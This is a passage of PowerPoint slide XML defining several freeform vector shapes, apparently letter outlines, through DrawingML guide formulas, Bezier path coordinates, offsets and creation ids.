                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="78" y="113"/>
                    <a:pt x="150" y="11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6" name="Freeform 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B3B19E-5A19-4C3D-8E4D-8B77600EDDA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId38"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5634039" y="2803525"/>
              <a:ext cx="101600" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 238"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 238"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 238"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 21 w 238"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 238"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 238"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 43 w 238"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 43 w 238"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 238"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 238"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 238"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 238 w 238"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 238"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 238"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 238"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 238"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 238"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 238"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 238"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 238"/>
                <a:gd name="T39" fmla="*/ 209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8" h="307">
                  <a:moveTo>
                    <a:pt x="77" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="294"/>
                    <a:pt x="43" y="304"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294"/>
                    <a:pt x="77" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="303"/>
                    <a:pt x="119" y="307"/>
                    <a:pt x="135" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="307"/>
                    <a:pt x="238" y="260"/>
                    <a:pt x="238" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="86"/>
                    <a:pt x="94" y="95"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77" y="173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="143"/>
                    <a:pt x="106" y="117"/>
                    <a:pt x="137" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="117"/>
                    <a:pt x="203" y="153"/>
                    <a:pt x="203" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="245"/>
                    <a:pt x="168" y="277"/>
                    <a:pt x="133" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="277"/>
                    <a:pt x="77" y="233"/>
                    <a:pt x="77" y="20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 name="Freeform 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84869434-0167-445D-B507-3FC70DCEE425}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId39"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5748339" y="2803525"/>
              <a:ext cx="100013" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 237"/>
                <a:gd name="T1" fmla="*/ 274 h 304"/>
                <a:gd name="T2" fmla="*/ 20 w 237"/>
                <a:gd name="T3" fmla="*/ 274 h 304"/>
                <a:gd name="T4" fmla="*/ 0 w 237"/>
                <a:gd name="T5" fmla="*/ 289 h 304"/>
                <a:gd name="T6" fmla="*/ 20 w 237"/>
                <a:gd name="T7" fmla="*/ 304 h 304"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 304 h 304"/>
                <a:gd name="T10" fmla="*/ 237 w 237"/>
                <a:gd name="T11" fmla="*/ 284 h 304"/>
                <a:gd name="T12" fmla="*/ 237 w 237"/>
                <a:gd name="T13" fmla="*/ 240 h 304"/>
                <a:gd name="T14" fmla="*/ 220 w 237"/>
                <a:gd name="T15" fmla="*/ 219 h 304"/>
                <a:gd name="T16" fmla="*/ 203 w 237"/>
                <a:gd name="T17" fmla="*/ 240 h 304"/>
                <a:gd name="T18" fmla="*/ 203 w 237"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 70 w 237"/>
                <a:gd name="T21" fmla="*/ 274 h 304"/>
                <a:gd name="T22" fmla="*/ 70 w 237"/>
                <a:gd name="T23" fmla="*/ 162 h 304"/>
                <a:gd name="T24" fmla="*/ 135 w 237"/>
                <a:gd name="T25" fmla="*/ 162 h 304"/>
                <a:gd name="T26" fmla="*/ 152 w 237"/>
                <a:gd name="T27" fmla="*/ 190 h 304"/>
                <a:gd name="T28" fmla="*/ 169 w 237"/>
                <a:gd name="T29" fmla="*/ 170 h 304"/>
                <a:gd name="T30" fmla="*/ 169 w 237"/>
                <a:gd name="T31" fmla="*/ 123 h 304"/>
                <a:gd name="T32" fmla="*/ 152 w 237"/>
                <a:gd name="T33" fmla="*/ 103 h 304"/>
                <a:gd name="T34" fmla="*/ 135 w 237"/>
                <a:gd name="T35" fmla="*/ 131 h 304"/>
                <a:gd name="T36" fmla="*/ 70 w 237"/>
                <a:gd name="T37" fmla="*/ 131 h 304"/>
                <a:gd name="T38" fmla="*/ 70 w 237"/>
                <a:gd name="T39" fmla="*/ 30 h 304"/>
                <a:gd name="T40" fmla="*/ 192 w 237"/>
                <a:gd name="T41" fmla="*/ 30 h 304"/>
                <a:gd name="T42" fmla="*/ 192 w 237"/>
                <a:gd name="T43" fmla="*/ 56 h 304"/>
                <a:gd name="T44" fmla="*/ 209 w 237"/>
                <a:gd name="T45" fmla="*/ 77 h 304"/>
                <a:gd name="T46" fmla="*/ 226 w 237"/>
                <a:gd name="T47" fmla="*/ 56 h 304"/>
                <a:gd name="T48" fmla="*/ 226 w 237"/>
                <a:gd name="T49" fmla="*/ 20 h 304"/>
                <a:gd name="T50" fmla="*/ 206 w 237"/>
                <a:gd name="T51" fmla="*/ 0 h 304"/>
                <a:gd name="T52" fmla="*/ 20 w 237"/>
                <a:gd name="T53" fmla="*/ 0 h 304"/>
                <a:gd name="T54" fmla="*/ 0 w 237"/>
                <a:gd name="T55" fmla="*/ 15 h 304"/>
                <a:gd name="T56" fmla="*/ 20 w 237"/>
                <a:gd name="T57" fmla="*/ 30 h 304"/>
                <a:gd name="T58" fmla="*/ 35 w 237"/>
                <a:gd name="T59" fmla="*/ 30 h 304"/>
                <a:gd name="T60" fmla="*/ 35 w 237"/>
                <a:gd name="T61" fmla="*/ 27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7" h="304">
                  <a:moveTo>
                    <a:pt x="35" y="274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="304"/>
                    <a:pt x="237" y="300"/>
                    <a:pt x="237" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="237" y="240"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="230"/>
                    <a:pt x="237" y="219"/>
                    <a:pt x="220" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="219"/>
                    <a:pt x="203" y="230"/>
                    <a:pt x="203" y="240"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="162"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="182"/>
                    <a:pt x="135" y="190"/>
                    <a:pt x="152" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="190"/>
                    <a:pt x="169" y="179"/>
                    <a:pt x="169" y="170"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="123"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="114"/>
                    <a:pt x="169" y="103"/>
                    <a:pt x="152" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="103"/>
                    <a:pt x="135" y="111"/>
                    <a:pt x="135" y="131"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="56"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="66"/>
                    <a:pt x="192" y="77"/>
                    <a:pt x="209" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="77"/>
                    <a:pt x="226" y="66"/>
                    <a:pt x="226" y="56"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="5"/>
                    <a:pt x="223" y="0"/>
                    <a:pt x="206" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="27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 name="Freeform 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46EB8BD-3F86-424E-82E2-4D3BD3BA5045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId40"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5865814" y="2803525"/>
              <a:ext cx="85725" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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9" name="Freeform 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD462A04-A3AB-45E4-99A2-771B5C92927D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId41"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5970589" y="2840038"/>
              <a:ext cx="101600" cy="147638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 240"/>
                <a:gd name="T27" fmla="*/ 17 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 2 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 199 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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0" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="41"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="2"/>
                    <a:pt x="102" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
